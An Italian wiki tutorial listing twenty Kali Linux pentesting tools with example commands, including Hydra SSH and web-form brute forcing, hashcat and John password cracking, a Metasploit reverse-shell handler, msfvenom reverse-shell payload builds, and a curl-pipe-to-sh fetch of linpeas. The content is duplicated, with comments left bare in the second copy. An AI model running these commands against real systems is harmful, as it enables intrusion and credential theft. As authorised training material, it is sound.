📚 Wiki
› 🔧 Setup & Configurazione
› Kali Linux: i 20 tool essenziali per il pentesting
Kali Linux: i 20 tool essenziali per il pentesting
👤 di @CyberSec_Italia
📅 28/04/2026
👁️ 215 visite
kali-linux
tools
nmap
metasploit
burp-suite
pentesting
<h2>Disclaimer</h2>
<p>Tutti i tool descritti sono da usare ESCLUSIVAMENTE su sistemi propri o su piattaforme autorizzate (TryHackMe, HackTheBox, laboratori virtuali). L\'uso non autorizzato è illegale.</p>
<h2>Reconnaissance (Ricognizione)</h2>
<h3>1. Nmap — Network Scanner</h3>
<p>Il tool più usato nel pentesting. Scansione porte, rilevamento servizi e OS.</p>
<pre><code># Scansione base
nmap -sV -sC target_ip
nmap -A -T4 target_ip
nmap -sS -T2 target_ip</code></pre>
<h3>2. Gobuster/ffuf — Directory Enumeration</h3>
<p>Trova directory e file nascosti su web server.</p>
<pre><code># Gobuster
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
ffuf -u http://target/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt</code></pre>
<h3>3. theHarvester — OSINT</h3>
<p>Raccoglie email, subdomain, IP, URL da fonti pubbliche.</p>
<pre><code>theHarvester -d example.com -b google,bing,linkedin</code></pre>
<h3>4. Recon-ng — Framework OSINT</h3>
<p>Framework modulare per reconnaissance passiva, simile a Metasploit per OSINT.</p>
<h2>Web Application Testing</h2>
<h3>5. Burp Suite Community</h3>
<p>Il proxy intercettore standard per web app testing. Features: intercept, repeater, intruder, scanner (pro).</p>
<p>Setup: configura il browser per usare proxy 127.0.0.1:8080, installa certificato CA di Burp.</p>
<h3>6. SQLmap — SQL Injection Automatizzato</h3>
<pre><code># Test base
sqlmap -u "http://target/page?id=1"
sqlmap -u "http://target/page?id=1" --cookie="session=abc123" --dbs</code></pre>
<h3>7. Nikto — Web Server Scanner</h3>
<p>Scansiona vulnerabilità web note: file di default, configurazioni insicure, header mancanti.</p>
<pre><code>nikto -h http://target</code></pre>
<h2>Password Attacks</h2>
<h3>8. Hashcat — Password Cracking GPU</h3>
<pre><code># Attacco dizionario su hash MD5
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 22000 capture.hc22000 wordlist.txt</code></pre>
<h3>9. John the Ripper — Password Cracking CPU</h3>
<pre><code># Crack hash Linux /etc/shadow
john --wordlist=/usr/share/wordlists/rockyou.txt shadow_file
zip2john protected.zip > zip.hash && john zip.hash</code></pre>
<h3>10. Hydra — Online Brute Force</h3>
<pre><code># Brute force SSH
hydra -l admin -P wordlist.txt ssh://target_ip
hydra -l admin -P wordlist.txt target_ip http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"</code></pre>
<h2>Exploitation</h2>
<h3>11. Metasploit Framework</h3>
<p>Il framework di exploitation più usato. Migliaia di exploit, payload e moduli di post-exploitation.</p>
<pre><code>msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST your_ip
set LPORT 4444
run</code></pre>
<h3>12. msfvenom — Payload Generator</h3>
<pre><code># Shell inversa Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ip LPORT=4444 -f exe > shell.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ip LPORT=4444 -f elf > shell.elf</code></pre>
<h2>Network Sniffing</h2>
<h3>13. Wireshark — Packet Analyzer</h3>
<p>Analizza il traffico di rete in tempo reale. Filtri utili: <code>http</code>, <code>tcp.port == 80</code>, <code>ip.addr == 192.168.1.1</code>.</p>
<h3>14. tcpdump — CLI Packet Capture</h3>
<pre><code># Cattura traffico su interfaccia
tcpdump -i eth0 -w capture.pcap
tcpdump -i eth0 host 192.168.1.1 and port 80</code></pre>
<h2>Post-Exploitation</h2>
<h3>15. LinPEAS/WinPEAS — Privilege Escalation</h3>
<p>Script per trovare vettori di privilege escalation su Linux e Windows.</p>
<pre><code>curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh</code></pre>
<h3>16. BloodHound — Active Directory Recon</h3>
<p>Visualizza relazioni e percorsi di attacco in ambienti Active Directory.</p>
<h2>Wireless Testing</h2>
<h3>17. Aircrack-ng Suite</h3>
<p>Suite per testing reti WiFi: airmon-ng (monitor mode), airodump-ng (capture), aircrack-ng (crack WPA2).</p>
<h2>Steganografia e Forensics</h2>
<h3>18. Binwalk — Firmware Analysis</h3>
<pre><code>binwalk -e firmware.bin # estrai file embedded</code></pre>
<h3>19. Exiftool — Metadata Extraction</h3>
<pre><code>exiftool photo.jpg # mostra tutti i metadati</code></pre>
<h3>20. Volatility — Memory Forensics</h3>
<p>Analizza dump di memoria RAM: estrai processi, connessioni di rete, credenziali.</p>
<p>Tutti i tool descritti sono da usare ESCLUSIVAMENTE su sistemi propri o su piattaforme autorizzate (TryHackMe, HackTheBox, laboratori virtuali). L\'uso non autorizzato è illegale.</p>
<h2>Reconnaissance (Ricognizione)</h2>
<h3>1. Nmap — Network Scanner</h3>
<p>Il tool più usato nel pentesting. Scansione porte, rilevamento servizi e OS.</p>
<pre><code># Scansione base
nmap -sV -sC target_ip
Scansione completa con script
nmap -A -T4 target_ip
Scansione silente (evita IDS)
nmap -sS -T2 target_ip</code></pre>
<h3>2. Gobuster/ffuf — Directory Enumeration</h3>
<p>Trova directory e file nascosti su web server.</p>
<pre><code># Gobuster
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
ffuf (più veloce)
ffuf -u http://target/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt</code></pre>
<h3>3. theHarvester — OSINT</h3>
<p>Raccoglie email, subdomain, IP, URL da fonti pubbliche.</p>
<pre><code>theHarvester -d example.com -b google,bing,linkedin</code></pre>
<h3>4. Recon-ng — Framework OSINT</h3>
<p>Framework modulare per reconnaissance passiva, simile a Metasploit per OSINT.</p>
<h2>Web Application Testing</h2>
<h3>5. Burp Suite Community</h3>
<p>Il proxy intercettore standard per web app testing. Features: intercept, repeater, intruder, scanner (pro).</p>
<p>Setup: configura il browser per usare proxy 127.0.0.1:8080, installa certificato CA di Burp.</p>
<h3>6. SQLmap — SQL Injection Automatizzato</h3>
<pre><code># Test base
sqlmap -u "http://target/page?id=1"
Con cookie (sessione autenticata)
sqlmap -u "http://target/page?id=1" --cookie="session=abc123" --dbs</code></pre>
<h3>7. Nikto — Web Server Scanner</h3>
<p>Scansiona vulnerabilità web note: file di default, configurazioni insicure, header mancanti.</p>
<pre><code>nikto -h http://target</code></pre>
<h2>Password Attacks</h2>
<h3>8. Hashcat — Password Cracking GPU</h3>
<pre><code># Attacco dizionario su hash MD5
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
Attacco brute force WPA2
hashcat -m 22000 capture.hc22000 wordlist.txt</code></pre>
<h3>9. John the Ripper — Password Cracking CPU</h3>
<pre><code># Crack hash Linux /etc/shadow
john --wordlist=/usr/share/wordlists/rockyou.txt shadow_file
Crack zip protetto da password
zip2john protected.zip > zip.hash && john zip.hash</code></pre>
<h3>10. Hydra — Online Brute Force</h3>
<pre><code># Brute force SSH
hydra -l admin -P wordlist.txt ssh://target_ip
Brute force form web
hydra -l admin -P wordlist.txt target_ip http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"</code></pre>
<h2>Exploitation</h2>
<h3>11. Metasploit Framework</h3>
<p>Il framework di exploitation più usato. Migliaia di exploit, payload e moduli di post-exploitation.</p>
<pre><code>msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST your_ip
set LPORT 4444
run</code></pre>
<h3>12. msfvenom — Payload Generator</h3>
<pre><code># Shell inversa Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ip LPORT=4444 -f exe > shell.exe
Shell inversa Linux ELF
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ip LPORT=4444 -f elf > shell.elf</code></pre>
<h2>Network Sniffing</h2>
<h3>13. Wireshark — Packet Analyzer</h3>
<p>Analizza il traffico di rete in tempo reale. Filtri utili: <code>http</code>, <code>tcp.port == 80</code>, <code>ip.addr == 192.168.1.1</code>.</p>
<h3>14. tcpdump — CLI Packet Capture</h3>
<pre><code># Cattura traffico su interfaccia
tcpdump -i eth0 -w capture.pcap
Filtra per host e porta
tcpdump -i eth0 host 192.168.1.1 and port 80</code></pre>
<h2>Post-Exploitation</h2>
<h3>15. LinPEAS/WinPEAS — Privilege Escalation</h3>
<p>Script per trovare vettori di privilege escalation su Linux e Windows.</p>
<pre><code>curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh</code></pre>
<h3>16. BloodHound — Active Directory Recon</h3>
<p>Visualizza relazioni e percorsi di attacco in ambienti Active Directory.</p>
<h2>Wireless Testing</h2>
<h3>17. Aircrack-ng Suite</h3>
<p>Suite per testing reti WiFi: airmon-ng (monitor mode), airodump-ng (capture), aircrack-ng (crack WPA2).</p>
<h2>Steganografia e Forensics</h2>
<h3>18. Binwalk — Firmware Analysis</h3>
<pre><code>binwalk -e firmware.bin # estrai file embedded</code></pre>
<h3>19. Exiftool — Metadata Extraction</h3>
<pre><code>exiftool photo.jpg # mostra tutti i metadati</code></pre>
<h3>20. Volatility — Memory Forensics</h3>
<p>Analizza dump di memoria RAM: estrai processi, connessioni di rete, credenziali.</p>
📄 Info pagina
📂 🔧 Setup & Configurazione
👤 Autore: @CyberSec_Italia
📅 Creata: 20/04/2026
📅 Aggiornata: 28/04/2026
👁️ Visualizzazioni: 215
🔄 Revisioni: 1